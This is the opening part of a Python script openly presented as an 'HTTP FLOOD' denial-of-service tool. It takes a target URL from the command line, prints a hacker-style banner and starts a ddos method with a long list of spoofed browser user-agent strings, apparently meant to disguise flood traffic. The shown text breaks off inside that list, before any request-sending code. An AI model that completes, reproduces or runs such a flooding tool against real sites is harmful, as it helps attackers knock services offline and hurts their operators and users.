# coding: UTF-8

from threading import Thread
import requests
import random
import sys

class HTTP(object):
    def __init__(self):
        try:
            self.banner()
            self.url = sys.argv[1]
        except:
               print("[!] Usage: " + sys.argv[0] + " [URL]")
               sys.exit()

    def banner(self):
        print ("""
      .---.        .-----------
     /     \  __  /    ------
    / /     \(  )/    -----
   //////   ' \/ `   ---
  //// / // :    : ---
 // /   /  /`    '--
//          //..\\
       ====UU====UU====
           '//||\\`
             ''``
[#] HTTP FLOOD [#]
[+] CODED BY SukaJanda01 [#]
""")
    def ddos(self):
        agents = ['Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; de) Opera 8.0','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; de) Opera 8.02','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.0','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.02','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.52','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.53','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.54',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; pl) Opera 8.54',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; da) Opera 8.54',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; de) Opera 8.0',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; de) Opera 8.01',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; de) Opera 8.02',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; de) Opera 8.52',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; de) Opera 8.54',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; de) Opera 9.50',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 7.60',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.0',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.00',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.01',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.02',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.52',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.53',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.54',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.24',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.26',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; es-la) Opera 9.27',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; fr) Opera 8.54',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; IT) Opera 8.0',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; pl) Opera 8.52',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; pl) Opera 8.54',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.0',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.53',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.54',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 9.52',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; sv) Opera 8.50',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; sv) Opera 8.51',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; sv) Opera 8.53',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; tr) Opera 8.50',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; zh-cn) Opera 8.65',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; en) Opera 8.50',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; en) Opera 9.27',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; en) Opera 9.50',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; ru) Opera 8.50',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.0; en) Opera 9.26',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.0; en) Opera 9.50',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.0; tr) Opera 10.10',
'Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; de) Opera 10.10',
'Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; en) Opera 8.02',
'Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; en) Opera 8.51',
'Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; en) Opera 8.52',
'Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; en) Opera 8.54',
'Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; en) Opera 9.22',
'Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; en) Opera 9.27',
'Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; ru) Opera 8.51',
'Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux x86_64; en) Opera 9.50',
'Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux x86_64; en) Opera 9.60',
'Mozilla/4.0 (compatible; MSIE 8.0; Linux i686; en) Opera 10.51',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; ko) Opera 10.53',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; pl) Opera 11.00',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; en) Opera 11.00',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; ja) Opera 11.00',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; de) Opera 11.01',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; en) Opera 10.62',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; fr) Opera 11.00',
'Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; de) Opera 10.62',
'Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; pl) Opera 11.00',
'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; zh-cn) Opera 8.65',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; de) Opera 11.51',
'Mozilla/5.0 (Linux i686; U; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.51',
'Mozilla/5.0 (Macintosh; Intel Mac OS X; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.27',
'Mozilla/5.0 (Macintosh; PPC Mac OS X; U; en) Opera 8.51',
'Mozilla/5.0 (Windows 98; U; en) Opera 8.54',
'Mozilla/5.0 (Windows ME; U; en) Opera 8.51',
'Mozilla/5.0 (Windows NT 5.0; U; de) Opera 8.50',
'Mozilla/5.0 (Windows NT 5.1) Gecko/20100101 Firefox/14.0 Opera/12.0',
'Mozilla/5.0 (Windows NT 5.1; U; de) Opera 8.50',
'Mozilla/5.0 (Windows NT 5.1; U; de) Opera 8.52',
'Mozilla/5.0 (Windows NT 5.1; U; de; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.51',
'Mozilla/5.0 (Windows NT 5.1; U; de; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.52',
'Mozilla/5.0 (Windows NT 5.1; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 11.00',
'Mozilla/5.0 (Windows NT 5.1; U; en-GB; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.51',
'Mozilla/5.0 (Windows NT 5.1; U; en-GB; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.61',
'Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.0',
'Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.01',
'Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.02',
'Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.50',
'Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.51',
'Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.52',
'Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.53',
'Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.22',
'Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.24',
'Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.26',
'Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.51',
'Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.1) Gecko/20061208 Firefox/5.0 Opera 11.11',
'Mozilla/5.0 (Windows NT 5.1; U; es-la; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.27',
'Mozilla/5.0 (Windows NT 5.1; U; Firefox/3.5; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53',
'Mozilla/5.0 (Windows NT 5.1; U; Firefox/4.5; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53',
'Mozilla/5.0 (Windows NT 5.1; U; Firefox/5.0; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53',
'Mozilla/5.0 (Windows NT 5.1; U; fr) Opera 8.51',
'Mozilla/5.0 (Windows NT 5.1; U; pl) Opera 8.54',
'Mozilla/5.0 (Windows NT 5.1; U; pl; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 11.00',
'Mozilla/5.0 (Windows NT 5.1; U; ru) Opera 8.51',
'Mozilla/5.0 (Windows NT 5.1; U; zh-cn; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.50',
'Mozilla/5.0 (Windows NT 5.1; U; zh-cn; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53',
'Mozilla/5.0 (Windows NT 5.1; U; zh-cn; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.70',
'Mozilla/5.0 (Windows NT 5.2; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.27',
'Mozilla/5.0 (Windows NT 5.2; U; ru; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.70',
'Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14',
'Mozilla/5.0 (Windows NT 6.0; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.51',
'Mozilla/5.0 (Windows NT 6.0; U; ja; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 11.00',
'Mozilla/5.0 (Windows NT 6.0; U; tr; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 10.10',
'Mozilla/5.0 (Windows NT 6.1; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 11.01',
'Mozilla/5.0 (Windows NT 6.1; U; en-GB; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.51',
'Mozilla/5.0 (Windows NT 6.1; U; nl; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 11.01',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9b3) Gecko/2008020514 Opera 9.5',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101213 Opera/9.80 (Windows NT 6.1; U; zh-tw) Presto/2.7.62 Version/11.01',
'Mozilla/5.0 (X11; Linux i686; U; en) Opera 8.52',
'Mozilla/5.0 (X11; Linux i686; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.23',
'Mozilla/5.0 (X11; Linux i686; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.51',
'Mozilla/5.0 (X11; Linux x86_64; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.62',
'Mozilla/5.0 (X11; Linux x86_64; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.60',
'Opera/8.00 (Windows NT 5.1; U; en)',
'Opera/8.01 (Macintosh; PPC Mac OS X; U; en)',
'Opera/8.01 (Macintosh; U; PPC Mac OS; en)',
'Opera/8.01 (Windows NT 5.0; U; de)',
'Opera/8.01 (Windows NT 5.1; U; de)',
'Opera/8.01 (Windows NT 5.1; U; en)',
'Opera/8.01 (Windows NT 5.1; U; fr)',
'Opera/8.01 (Windows NT 5.1; U; pl)',
'Opera/8.02 (Windows NT 5.1; U; de)',
'Opera/8.02 (Windows NT 5.1; U; en)',
'Opera/8.02 (Windows NT 5.1; U; ru)',
'Opera/8.0 (Windows NT 5.1; U; en)',
'Opera/8.0 (X11; Linux i686; U; cs)',
'Opera/8.10 (Windows NT 5.1; U; en)',
'Opera/8.50 (Windows 98; U; en)',
'Opera/8.50 (Windows 98; U; ru)',
'Opera/8.50 (Windows ME; U; en)',
'Opera/8.50 (Windows NT 4.0; U; zh-cn)',
'Opera/8.50 (Windows NT 5.0; U; de)',
'Opera/8.50 (Windows NT 5.0; U; en)',
'Opera/8.50 (Windows NT 5.0; U; fr)',
'Opera/8.50 (Windows NT 5.1; U; de)',
'Opera/8.50 (Windows NT 5.1; U; en)',
'Opera/8.50 (Windows NT 5.1; U; es-ES)',
'Opera/8.50 (Windows NT 5.1; U; fr)',
'Opera/8.50 (Windows NT 5.1; U; pl)',
'Opera/8.50 (Windows NT 5.1; U; ru)',
'Opera/8.51 (FreeBSD 5.1; U; en)',
'Opera/8.51 (Macintosh; PPC Mac OS X; U; de)',
'Opera/8.51 (Windows 98; U; en)',
'Opera/8.51 (Windows NT 5.0; U; en)',
'Opera/8.51 (Windows NT 5.1; U; de)',
'Opera/8.51 (Windows NT 5.1; U; en)',
'Opera/8.51 (Windows NT 5.1; U; fr)',
'Opera/8.51 (Windows NT 5.1; U; nb)',
'Opera/8.51 (Windows NT 5.1; U; pl)',
'Opera/8.51 (X11; Linux i686; U; en)',
'Opera/8.51 (X11; Linux x86_64; U; en)',
'Opera/8.51 (X11; U; Linux i686; en-US; rv:1.8)',
'Opera/8.52 (Windows ME; U; en)',
'Opera/8.52 (Windows NT 5.0; U; en)',
'Opera/8.52 (Windows NT 5.1; U; en)',
'Opera/8.52 (Windows NT 5.1; U; ru)',
'Opera/8.52 (X11; Linux i686; U; en)',
'Opera/8.52 (X11; Linux x86_64; U; en)',
'Opera/8.53 (Windows 98; U; en)',
'Opera/8.53 (Windows NT 5.0; U; en)',
'Opera/8.53 (Windows NT 5.1; U; de)',
'Opera/8.53 (Windows NT 5.1; U; en)',
'Opera/8.53 (Windows NT 5.1; U; pt)',
'Opera/8.53 (Windows NT 5.2; U; en)',
'Opera/8.54 (Windows 98; U; en)',
'Opera/8.54 (Windows NT 4.0; U; zh-cn)',
'Opera/8.54 (Windows NT 5.0; U; de)',
'Opera/8.54 (Windows NT 5.0; U; en)',
'Opera/8.54 (Windows NT 5.1; U; en)',
'Opera/8.54 (Windows NT 5.1; U; pl)',
'Opera/8.54 (Windows NT 5.1; U; ru)',
'Opera/8.54 (X11; Linux i686; U; de)',
'Opera/8.54 (X11; Linux i686; U; pl)',
'Opera/9.00 (Macintosh; PPC Mac OS X; U; es)',
'Opera/9.00 (Windows NT 5.0; U; en)',
'Opera/9.00 (Windows NT 5.1; U; de)',
'Opera/9.00 (Windows NT 5.1; U; en)',
'Opera/9.00 (Windows NT 5.1; U; es-es)',
'Opera/9.00 (Windows NT 5.1; U; fi)',
'Opera/9.00 (Windows NT 5.1; U; fr)',
'Opera/9.00 (Windows NT 5.1; U; it)',
'Opera/9.00 (Windows NT 5.1; U; ja)',
'Opera/9.00 (Windows NT 5.1; U; nl)',
'Opera/9.00 (Windows NT 5.1; U; pl)',
'Opera/9.00 (Windows NT 5.1; U; ru)',
'Opera/9.00 (Windows NT 5.2; U; en)',
'Opera/9.00 (Windows NT 5.2; U; pl)',
'Opera/9.00 (Windows NT 5.2; U; ru)',
'Opera/9.00 (Windows; U)',
'Opera/9.00 (X11; Linux i686; U; de)',
'Opera/9.00 (X11; Linux i686; U; en)',
'Opera/9.00 (X11; Linux i686; U; pl)',
'Opera/9.01 (Macintosh; PPC Mac OS X; U; en)',
'Opera/9.01 (Macintosh; PPC Mac OS X; U; it)',
'Opera/9.01 (Windows NT 5.0; U; de)',
'Opera/9.01 (Windows NT 5.0; U; en)',
'Opera/9.01 (Windows NT 5.1)',
'Opera/9.01 (Windows NT 5.1; U; bg)',
'Opera/9.01 (Windows NT 5.1; U; cs)',
'Opera/9.01 (Windows NT 5.1; U; da)',
'Opera/9.01 (Windows NT 5.1; U; de)',
'Opera/9.01 (Windows NT 5.1; U; en)',
'Opera/9.01 (Windows NT 5.1; U; es-es)',
'Opera/9.01 (Windows NT 5.1; U; ja)',
'Opera/9.01 (Windows NT 5.1; U; pl)',
'Opera/9.01 (Windows NT 5.1; U; ru)',
'Opera/9.01 (Windows NT 5.2; U; en)',
'Opera/9.01 (Windows NT 5.2; U; ru)',
'Opera/9.01 (X11; FreeBSD 6 i386; U; en)',
'Opera/9.01 (X11; FreeBSD 6 i386; U;pl)',
'Opera/9.01 (X11; Linux i686; U; en)',
'Opera/9.01 (X11; OpenBSD i386; U; en)',
'Opera/9.02 (Windows NT 5.0; U; en)',
'Opera/9.02 (Windows NT 5.0; U; pl)',
'Opera/9.02 (Windows NT 5.0; U; sv)',
'Opera/9.02 (Windows NT 5.1; U; de)',
'Opera/9.02 (Windows NT 5.1; U; en)',
'Opera/9.02 (Windows NT 5.1; U; fi)',
'Opera/9.02 (Windows NT 5.1; U; ja)',
'Opera/9.02 (Windows NT 5.1; U; nb)',
'Opera/9.02 (Windows NT 5.1; U; pl)',
'Opera/9.02 (Windows NT 5.1; U; pt-br)',
'Opera/9.02 (Windows NT 5.1; U; ru)',
'Opera/9.02 (Windows NT 5.1; U; zh-cn)',
'Opera/9.02 (Windows NT 5.2; U; de)',
'Opera/9.02 (Windows NT 5.2; U; en)',
'Opera/9.02 (Windows; U; nl)',
'Opera/9.02 (Windows XP; U; ru)',
'Opera/9.02 (X11; Linux i686; U; de)',
'Opera/9.02 (X11; Linux i686; U; en)',
'Opera/9.02 (X11; Linux i686; U; hu)',
'Opera/9.02 (X11; Linux i686; U; pl)',
'Opera/9.10 (Windows NT 5.1; U; es-es)',
'Opera/9.10 (Windows NT 5.1; U; fi)',
'Opera/9.10 (Windows NT 5.1; U; hu)',
'Opera/9.10 (Windows NT 5.1; U; it)',
'Opera/9.10 (Windows NT 5.1; U; nl)',
'Opera/9.10 (Windows NT 5.1; U; pl)',
'Opera/9.10 (Windows NT 5.1; U; pt)',
'Opera/9.10 (Windows NT 5.1; U; sv)',
'Opera/9.10 (Windows NT 5.1; U; zh-tw)',
'Opera/9.10 (Windows NT 5.2; U; de)',
'Opera/9.10 (Windows NT 5.2; U; en)',
'Opera/9.10 (Windows NT 6.0; U; en)',
'Opera/9.10 (Windows NT 6.0; U; it-IT)',
'Opera/9.10 (X11; Linux i386; U; en)',
'Opera/9.10 (X11; Linux i686; U; en)',
'Opera/9.10 (X11; Linux i686; U; kubuntu;pl)',
'Opera/9.10 (X11; Linux i686; U; pl)',
'Opera/9.10 (X11; Linux; U; en)',
'Opera/9.10 (X11; Linux x86_64; U; en)',
'Opera/9.12 (Windows NT 5.0; U)',
'Opera/9.12 (Windows NT 5.0; U; ru)',
'Opera/9.12 (X11; Linux i686; U; en) (Ubuntu)',
'Opera/9.20 (Windows NT 5.1; U; en)',
'Opera/9.20(Windows NT 5.1; U; en)',
'Opera/9.20 (Windows NT 5.1; U; es-AR)',
'Opera/9.20 (Windows NT 5.1; U; es-es)',
'Opera/9.20 (Windows NT 5.1; U; it)',
'Opera/9.20 (Windows NT 5.1; U; nb)',
'Opera/9.20 (Windows NT 5.1; U; zh-tw)',
'Opera/9.20 (Windows NT 5.2; U; en)',
'Opera/9.20 (Windows NT 6.0; U; de)',
'Opera/9.20 (Windows NT 6.0; U; en)',
'Opera/9.20 (Windows NT 6.0; U; es-es)',
'Opera/9.20 (X11; Linux i586; U; en)',
'Opera/9.20 (X11; Linux i686; U; en)',
'Opera/9.20 (X11; Linux i686; U; es-es)',
'Opera/9.20 (X11; Linux i686; U; pl)',
'Opera/9.20 (X11; Linux i686; U; ru)',
'Opera/9.20 (X11; Linux i686; U; tr)',
'Opera/9.20 (X11; Linux x86_64; U; en)',
'Opera/9.21 (Macintosh; Intel Mac OS X; U; en)',
'Opera/9.21 (Macintosh; PPC Mac OS X; U; en)',
'Opera/9.21 (Windows 98; U; en)',
'Opera/9.21 (Windows NT 5.0; U; de)',
'Opera/9.21 (Windows NT 5.1; U; de)',
'Opera/9.21 (Windows NT 5.1; U; en)',
'Opera/9.21 (Windows NT 5.1; U; fr)',
'Opera/9.21 (Windows NT 5.1; U; nl)',
'Opera/9.21 (Windows NT 5.1; U; pl)',
'Opera/9.21 (Windows NT 5.1; U; pt-br)',
'Opera/9.21 (Windows NT 5.1; U; ru)',
'Opera/9.21 (Windows NT 5.2; U; en)',
'Opera/9.21 (Windows NT 6.0; U; en)',
'Opera/9.21 (Windows NT 6.0; U; nb)',
'Opera/9.21 (X11; Linux i686; U; de)',
'Opera/9.21 (X11; Linux i686; U; en)',
'Opera/9.21 (X11; Linux i686; U; es-es)',
'Opera/9.21 (X11; Linux x86_64; U; en)',
'Opera/9.22 (Windows NT 5.1; U; en)',
'Opera/9.22 (Windows NT 5.1; U; fr)',
'Opera/9.22 (Windows NT 5.1; U; pl)',
'Opera/9.22 (Windows NT 6.0; U; en)',
'Opera/9.22 (Windows NT 6.0; U; ru)',
'Opera/9.22 (X11; Linux i686; U; de)',
'Opera/9.22 (X11; Linux i686; U; en)',
'Opera/9.22 (X11; OpenBSD i386; U; en)',
'Opera/9.23 (Macintosh; Intel Mac OS X; U; ja)',
'Opera/9.23 (Mac OS X; fr)',
'Opera/9.23 (Mac OS X; ru)',
'Opera/9.23 (Windows NT 5.0; U; de)',
'Opera/9.23 (Windows NT 5.0; U; en)',
'Opera/9.23 (Windows NT 5.1; U; da)',
'Opera/9.23 (Windows NT 5.1; U; de)',
'Opera/9.23 (Windows NT 5.1; U; en)',
'Opera/9.23 (Windows NT 5.1; U; fi)',
'Opera/9.23 (Windows NT 5.1; U; it)',
'Opera/9.23 (Windows NT 5.1; U; ja)',
'Opera/9.23 (Windows NT 5.1; U; pt)',
'Opera/9.23 (Windows NT 5.1; U; zh-cn)',
'Opera/9.23 (Windows NT 6.0; U; de)',
'Opera/9.23 (X11; Linux i686; U; en)',
'Opera/9.23 (X11; Linux i686; U; es-es)',
'Opera/9.23 (X11; Linux x86_64; U; en)',
'Opera/9.24 (Macintosh; PPC Mac OS X; U; en)',
'Opera/9.24 (Windows NT 5.0; U; ru)',
'Opera/9.24 (Windows NT 5.1; U; ru)',
'Opera/9.24 (Windows NT 5.1; U; tr)',
'Opera/9.24 (X11; Linux i686; U; de)',
'Opera/9.24 (X11; SunOS i86pc; U; en)',
'Opera/9.25 (Macintosh; Intel Mac OS X; U; en)',
'Opera/9.25 (Macintosh; PPC Mac OS X; U; en)',
'Opera/9.25 (OpenSolaris; U; en)',
'Opera/9.25 (Windows NT 4.0; U; en)',
'Opera/9.25 (Windows NT 5.0; U; cs)',
'Opera/9.25 (Windows NT 5.0; U; en)',
'Opera/9.25 (Windows NT 5.1; U; de)',
'Opera/9.25 (Windows NT 5.1; U; lt)',
'Opera/9.25 (Windows NT 5.1; U; ru)',
'Opera/9.25 (Windows NT 5.1; U; zh-cn)',
'Opera/9.25 (Windows NT 5.2; U; en)',
'Opera/9.25 (Windows NT 6.0; U; en-US)',
'Opera/9.25 (Windows NT 6.0; U; ru)',
'Opera/9.25 (Windows NT 6.0; U; sv)',
'Opera/9.25 (X11; Linux i686; U; en)',
'Opera/9.25 (X11; Linux i686; U; fr)',
'Opera/9.25 (X11; Linux i686; U; fr-ca)',
'Opera/9.26 (Macintosh; PPC Mac OS X; U; en)',
'Opera/9.26 (Windows NT 5.1; U; de)',
'Opera/9.26 (Windows NT 5.1; U; nl)',
'Opera/9.26 (Windows NT 5.1; U; pl)',
'Opera/9.26 (Windows NT 5.1; U; zh-cn)',
'Opera/9.26 (Windows; U; pl)',
'Opera/9.27 (Macintosh; Intel Mac OS X; U; sv)',
'Opera/9.27 (Windows NT 5.1; U; ja)',
'Opera/9.27 (Windows NT 5.2; U; en)',
'Opera/9.27 (X11; Linux i686; U; en)',
'Opera/9.27 (X11; Linux i686; U; fr)',
'Opera/9.4 (Windows NT 5.3; U; en)',
'Opera/9.4 (Windows NT 6.1; U; en)',
'Opera/9.50 (Macintosh; Intel Mac OS X; U; de)',
'Opera/9.50 (Macintosh; Intel Mac OS X; U; en)',
'Opera/9.50 (Windows NT 5.1; U; es-ES)',
'Opera/9.50 (Windows NT 5.1; U; it)',
'Opera/9.50 (Windows NT 5.1; U; nl)',
'Opera/9.50 (Windows NT 5.1; U; nn)',
'Opera/9.50 (Windows NT 5.1; U; ru)',
'Opera/9.50 (Windows NT 5.2; U; it)',
'Opera/9.50 (X11; Linux i686; U; es-ES)',
'Opera/9.50 (X11; Linux x86_64; U; nb)',
'Opera/9.50 (X11; Linux x86_64; U; pl)',
'Opera/9.51 (Macintosh; Intel Mac OS X; U; en)',
'Opera/9.51 (Windows NT 5.1; U; da)',
'Opera/9.51 (Windows NT 5.1; U; en)',
'Opera/9.51 (Windows NT 5.1; U; en-GB)',
'Opera/9.51 (Windows NT 5.1; U; es-AR)',
'Opera/9.51 (Windows NT 5.1; U; es-LA)',
'Opera/9.51 (Windows NT 5.1; U; fr)',
'Opera/9.51 (Windows NT 5.1; U; nn)',
'Opera/9.51 (Windows NT 5.2; U; en)',
'Opera/9.51 (Windows NT 6.0; U; en)',
'Opera/9.51 (Windows NT 6.0; U; es)',
'Opera/9.51 (Windows NT 6.0; U; sv)',
'Opera/9.51 (X11; Linux i686; U; de)',
'Opera/9.51 (X11; Linux i686; U; fr)',
'Opera/9.51 (X11; Linux i686; U; Linux Mint; en)',
'Opera/9.52 (Macintosh; Intel Mac OS X; U; pt)',
'Opera/9.52 (Macintosh; Intel Mac OS X; U; pt-BR)',
'Opera/9.52 (Macintosh; PPC Mac OS X; U; fr)',
'Opera/9.52 (Macintosh; PPC Mac OS X; U; ja)',
'Opera/9.52 (Windows NT 5.0; U; en)',
'Opera/9.52 (Windows NT 5.2; U; ru)',
'Opera/9.52 (Windows NT 6.0; U; de)',
'Opera/9.52 (Windows NT 6.0; U; en)',
'Opera/9.52 (Windows NT 6.0; U; fr)',
'Opera/9.52 (Windows NT 6.0; U; Opera/9.52 (X11; Linux x86_64; U); en)',
'Opera/9.52 (X11; Linux i686; U; cs)',
'Opera/9.52 (X11; Linux i686; U; en)',
'Opera/9.52 (X11; Linux i686; U; fr)',
'Opera/9.52 (X11; Linux x86_64; U)',
'Opera/9.52 (X11; Linux x86_64; U; en)',
'Opera/9.52 (X11; Linux x86_64; U; ru)',
'Opera/9.5 (Windows NT 5.1; U; fr)',
'Opera/9.5 (Windows NT 6.0; U; en)',
'Opera/9.60 (Windows NT 5.0; U; en) Presto/2.1.1',
'Opera/9.60 (Windows NT 5.1; U; en-GB) Presto/2.1.1',
'Opera/9.60 (Windows NT 5.1; U; es-ES) Presto/2.1.1',
'Opera/9.60 (Windows NT 5.1; U; sv) Presto/2.1.1',
'Opera/9.60 (Windows NT 5.1; U; tr) Presto/2.1.1',
'Opera/9.60 (Windows NT 6.0; U; bg) Presto/2.1.1',
'Opera/9.60 (Windows NT 6.0; U; de) Presto/2.1.1',
'Opera/9.60 (Windows NT 6.0; U; pl) Presto/2.1.1',
'Opera/9.60 (Windows NT 6.0; U; ru) Presto/2.1.1',
'Opera/9.60 (Windows NT 6.0; U; uk) Presto/2.1.1',
'Opera/9.60 (X11; Linux i686; U; en-GB) Presto/2.1.1',
'Opera/9.60 (X11; Linux i686; U; ru) Presto/2.1.1',
'Opera/9.60 (X11; Linux x86_64; U)',
'Opera/9.61 (Macintosh; Intel Mac OS X; U; de) Presto/2.1.1',
'Opera/9.61 (Windows NT 5.1; U; cs) Presto/2.1.1',
'Opera/9.61 (Windows NT 5.1; U; de) Presto/2.1.1',
'Opera/9.61 (Windows NT 5.1; U; en-GB) Presto/2.1.1',
'Opera/9.61 (Windows NT 5.1; U; en) Presto/2.1.1',
'Opera/9.61 (Windows NT 5.1; U; fr) Presto/2.1.1',
'Opera/9.61 (Windows NT 5.1; U; ru) Presto/2.1.1',
'Opera/9.61 (Windows NT 5.1; U; zh-cn) Presto/2.1.1',
'Opera/9.61 (Windows NT 5.1; U; zh-tw) Presto/2.1.1',
'Opera/9.61 (Windows NT 5.2; U; en) Presto/2.1.1',
